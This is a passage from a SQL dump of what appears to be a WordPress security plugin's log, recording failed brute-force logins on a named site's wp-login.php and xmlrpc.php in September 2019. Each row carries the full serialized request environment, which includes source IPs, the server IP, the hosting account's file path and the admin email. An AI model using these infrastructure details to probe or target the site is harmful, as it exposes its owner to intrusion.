04:33:23',18256992,19554608,'https://bintara.com.my/xmlrpc.php',1,0,'104.131.58.179'),(23801,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.131.58.179\";s:11:\"REMOTE_PORT\";s:5:\"42920\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2-D-Pfj5xLH6d8s95k5AAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568521999.2566\";s:12:\"REQUEST_TIME\";s:10:\"1568521999\";}}','notice','2019-09-15 04:33:21','2019-09-15 04:33:19',17906000,19231464,'https://bintara.com.my/wp-login.php',1,0,'104.131.58.179'),(23800,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.131.58.179\";s:11:\"REMOTE_PORT\";s:5:\"42920\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2-D-Pfj5xLH6d8s95k5AAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568521999.2566\";s:12:\"REQUEST_TIME\";s:10:\"1568521999\";}}','notice','2019-09-15 04:33:20','2019-09-15 04:33:19',17744080,19231464,'https://bintara.com.my/wp-login.php',1,0,'104.131.58.179'),(23799,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.55.177\";s:11:\"REMOTE_PORT\";s:5:\"59345\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX26J-Pfj5xLH6d8s95h6QAAAIc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568520744.029\";s:12:\"REQUEST_TIME\";s:10:\"1568520744\";}}','notice','2019-09-15 04:12:25','2019-09-15 04:12:24',18258264,19557712,'https://bintara.com.my/xmlrpc.php',1,0,'157.230.55.177'),(23798,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.230.55.177\";s:11:\"REMOTE_PORT\";s:5:\"58883\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX26JLXKYz7ocPqFjcW4fAAAAMg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568520740.5606\";s:12:\"REQUEST_TIME\";s:10:\"1568520740\";}}','notice','2019-09-15 04:12:22','2019-09-15 04:12:20',17738064,19228760,'https://bintara.com.my/wp-login.php',1,0,'157.230.55.177'),(23797,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.41.232\";s:11:\"REMOTE_PORT\";s:5:\"54462\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX23Q7XKYz7ocPqFjcW38gAAAMg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568520004.2116\";s:12:\"REQUEST_TIME\";s:10:\"1568520004\";}}','notice','2019-09-15 04:00:06','2019-09-15 04:00:05',18257624,19555384,'https://bintara.com.my/xmlrpc.php',1,0,'162.144.41.232'),(23796,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"162.144.41.232\";s:11:\"REMOTE_PORT\";s:5:\"53734\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX23PlNglnLNtPb4Wmx8UQAAAUQ\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568519998.9548\";s:12:\"REQUEST_TIME\";s:10:\"1568519998\";}}','notice','2019-09-15 04:00:01','2019-09-15 03:59:59',17827800,19317128,'https://bintara.com.my/wp-login.php',1,0,'162.144.41.232'),(23795,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.80.77\";s:11:\"REMOTE_PORT\";s:5:\"51914\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX20u7XKYz7ocPqFjcW3IAAAAMg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568519355.2046\";s:12:\"REQUEST_TIME\";s:10:\"1568519355\";}}','notice','2019-09-15 03:49:16','2019-09-15 03:49:15',18257432,19554576,'https://bintara.com.my/xmlrpc.php',1,0,'128.199.80.77'),(23794,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"128.199.80.77\";s:11:\"REMOTE_PORT\";s:5:\"51590\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX20uFNglnLNtPb4Wmx7YgAAAUA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568519353.013\";s:12:\"REQUEST_TIME\";s:10:\"1568519353\";}}','notice','2019-09-15 03:49:14','2019-09-15 03:49:13',17739072,19228968,'https://bintara.com.my/wp-login.php',1,0,'128.199.80.77'),(23793,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.229.72.84\";s:11:\"REMOTE_PORT\";s:5:\"37002\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX2vgvPfj5xLH6d8s95bFgAAAIo\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568518018.6797\";s:12:\"REQUEST_TIME\";s:10:\"1568518018\";}}','notice','2019-09-15 03:27:00','2019-09-15 